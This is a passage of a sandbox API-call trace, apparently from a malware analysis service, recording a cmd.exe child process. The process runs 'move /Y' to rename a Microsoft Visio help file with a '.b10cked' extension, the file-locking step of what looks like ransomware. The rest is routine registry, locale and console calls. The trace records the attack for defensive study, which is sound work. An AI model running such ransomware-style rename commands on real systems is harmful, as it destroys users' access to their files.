[0201.805] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3a1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1be0) returned 0x390e70 [0201.805] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x3a1be0 | out: lpFindFileData=0x3a1be0) returned 0 [0201.805] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.805] GetLastError () returned 0x12 [0201.805] _get_osfhandle (_FileHandle=2) returned 0xb [0201.805] GetFileType (hFile=0xb) returned 0x2 [0201.835] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.835] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eeacc | out: lpMode=0x1eeacc) returned 1 [0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0201.838] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.839] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeb40 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.839] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eeb24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeb24*=0x2c) returned 1 [0201.842] longjmp () [0201.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.842] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.845] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.849] exit (_Code=1) Process: id = "477" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e40" os_pid = "0xda8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29356 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29357 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29358 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29359 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29360 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29361 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29362 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29363 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29364 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 29365 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29656 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29657 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29658 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29659 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29660 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 29661 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29662 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29663 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29664 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29665 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29666 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29667 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29668 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29669 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29670 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 29671 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29672 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29673 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 29674 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29675 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 29676 start_va = 0x4d0000 end_va = 0x10cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 29677 start_va = 0x10d0000 end_va = 0x1232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 29678 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 29679 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 29683 start_va = 0x1260000 end_va = 0x131ffff entry_point = 0x1260000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 674 os_tid = 0x608 [0201.711] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fadc | out: lpSystemTimeAsFileTime=0x12fadc*(dwLowDateTime=0xad09d360, dwHighDateTime=0x1d440a9)) [0201.711] GetCurrentProcessId () returned 0xda8 [0201.711] GetCurrentThreadId () returned 0x608 [0201.711] GetTickCount () returned 0x38f43 [0201.711] QueryPerformanceCounter (in: lpPerformanceCount=0x12fad4 | out: lpPerformanceCount=0x12fad4*=25850055382) returned 1 [0201.712] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.712] __set_app_type (_Type=0x1) [0201.712] __p__fmode () returned 0x76b331f4 [0201.712] __p__commode () returned 0x76b331fc [0201.712] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.713] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.713] GetCurrentThreadId () returned 0x608 [0201.713] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x608) returned 0x38 [0201.713] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.713] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.713] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.716] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa6c | out: phkResult=0x12fa6c*=0x0) returned 0x2 [0201.716] VirtualQuery (in: lpAddress=0x12faa3, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.716] GetConsoleOutputCP () returned 0x1b5 [0201.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.718] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.718] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.724] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.726] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.752] GetEnvironmentStringsW () returned 0x1e0180* [0201.752] FreeEnvironmentStringsW (penv=0x1e0180) returned 1 [0201.753] GetEnvironmentStringsW () returned 0x1e0180* [0201.753] FreeEnvironmentStringsW (penv=0x1e0180) returned 1 [0201.753] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0xa8, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegCloseKey (hKey=0x40) returned 0x0 [0201.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegCloseKey (hKey=0x40) returned 0x0 [0201.753] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.753] srand (_Seed=0x5b8863a3) [0201.753] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"" [0201.753] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"" [0201.754] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.754] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.754] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.754] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.754] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.754] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.754] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.754] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.754] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.754] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.754] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.754] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.754] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.754] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.754] GetEnvironmentStringsW () returned 0x1e22d0* [0201.754] FreeEnvironmentStringsW (penv=0x1e22d0) returned 1 [0201.754] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.754] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.754] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.755] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.755] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.755] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.755] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.755] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.755] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.755] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.755] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.755] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7a8, lpFilePart=0x12f7a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7a4*="Desktop") returned 0x18 [0201.755] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.755] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x1e0010 [0201.755] FindClose (in: hFindFile=0x1e0010 | out: hFindFile=0x1e0010) returned 1 [0201.755] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x1e0010 [0201.755] FindClose (in: hFindFile=0x1e0010 | out: hFindFile=0x1e0010) returned 1 [0201.755] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x1e0010 [0201.755] FindClose (in: hFindFile=0x1e0010 | out: hFindFile=0x1e0010) returned 1 [0201.755] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.756] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.756] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.756] GetEnvironmentStringsW () returned 0x1e2af0* [0201.756] FreeEnvironmentStringsW (penv=0x1e2af0) returned 1 [0201.756] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.756] GetConsoleOutputCP () returned 0x1b5 [0201.765] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.765] GetUserDefaultLCID () returned 0x409 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="1") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.769] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.770] GetConsoleTitleW (in: lpConsoleTitle=0x1d08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.793] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.793] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.793] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.794] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.794] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.794] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.794] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.794] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.794] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.794] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.794] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.797] GetConsoleTitleW (in: lpConsoleTitle=0x12f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.827] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.827] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.827] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.827] 